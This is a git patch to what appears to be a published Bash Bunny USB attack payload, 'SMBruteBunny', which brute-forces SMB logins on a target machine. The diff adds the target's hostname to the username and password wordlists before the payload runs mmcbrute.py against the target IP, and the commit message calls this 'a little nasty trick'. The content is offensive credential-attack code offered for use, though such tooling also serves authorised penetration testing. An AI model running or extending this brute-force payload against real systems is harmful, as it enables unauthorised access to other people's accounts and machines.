From 92f1be3a524dbe853b7e5af9bf948acfeacb2684 Mon Sep 17 00:00:00 2001
From: "Mohamed A. Baset" <symbian2010@gmail.com>
Date: Thu, 30 May 2019 01:43:13 -0500
Subject: [PATCH] A little nasty trick!

Sometimes the host name is the same as the username so we will add it to the username and the password wordlists automatically to be used during the brute force attack.
---
 payloads/library/credentials/SMBruteBunny/payload.txt | 4 ++++
 1 file changed, 4 insertions(+)

diff --git a/payloads/library/credentials/SMBruteBunny/payload.txt b/payloads/library/credentials/SMBruteBunny/payload.txt
index 59ef97ee..a20b97ee 100644
--- a/payloads/library/credentials/SMBruteBunny/payload.txt
+++ b/payloads/library/credentials/SMBruteBunny/payload.txt
@@ -17,6 +17,10 @@ mount /dev/nandf /root/udisk/
 GET TARGET_IP
 GET TARGET_HOSTNAME
 
+# A little trick: Sometimes the host name is the same as the username so we will add it to the username and the password wordlists automatically to be used during the brute force attack.
+echo $TARGET_HOSTNAME >> $user_bruteforce_list
+echo $TARGET_HOSTNAME >> $pass_bruteforce_list
+
 # Perform SMB bruteforce attack
 LED STAGE1
 python $ORIGINAL_SWITCH/mmcbrute/mmcbrute.py -t $TARGET_IP -u $user_bruteforce_list -p $pass_bruteforce_list 2> $password_process_file